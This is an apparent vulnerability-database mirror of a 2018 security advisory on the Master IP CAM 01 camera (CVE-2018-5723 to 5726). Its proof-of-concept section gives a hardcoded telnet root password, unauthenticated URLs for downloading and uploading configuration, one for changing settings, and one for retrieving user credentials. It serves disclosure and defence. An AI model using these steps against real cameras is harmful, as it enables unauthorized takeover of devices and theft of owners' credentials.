Lucene search
K

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

🗓️ 17 Jan 2018 00:00:00Reported by Daniele LinguaglossaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 71 Views

Master IP CAM 01 Multiple Vulnerabilities: Hardcoded Password, Unauthenticated Acces

Related
Code
`# Exploit Title: Master IP CAM 01 Multiple Vulnerabilities  
# Date: 17-01-2018  
# Remote: Yes  
# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato  
# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89  
# Vendor: Master IP CAM  
# Version: 3.3.4.2103  
# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726  
  
I DESCRIPTION  
========================================================================  
The Master IP CAM 01 suffers of multiple vulnerabilities:  
  
# [CVE-2018-5723] Hardcoded Password for Root Account  
# [CVE-2018-5724] Unauthenticated Configuration Download and Upload  
# [CVE-2018-5725] Unauthenticated Configuration Change  
# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure  
  
  
II PROOF OF CONCEPT  
========================================================================  
  
## [CVE-2018-5723] Hardcoded Password for Root Account  
  
Is possible to access telnet with the hardcoded credential root:cat1029  
  
  
## [CVE-2018-5724] Unauthenticated Configuration Download and Upload  
  
Download:  
  
http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi  
  
Upload Form:  
  
### Unauthenticated Configuration Upload  
<form name="form6" method="post" enctype="multipart/form-data"  
action="cgi-bin/hi3510/restore.cgi" >  
<input type="file" name="setting_file" >  
<input type="submit" value="restore" >  
</form>  
  
  
## [CVE-2018-5725] Unauthenticated Configuration Change  
  
Change configuration:  
  
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080  
  
List of available commands here:  
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf  
  
  
## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure  
  
Retrieve sensitive information:  
  
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser  
  
  
III REFERENCES  
========================================================================  
http://syrion.me/blog/master-ipcam/  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726  
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation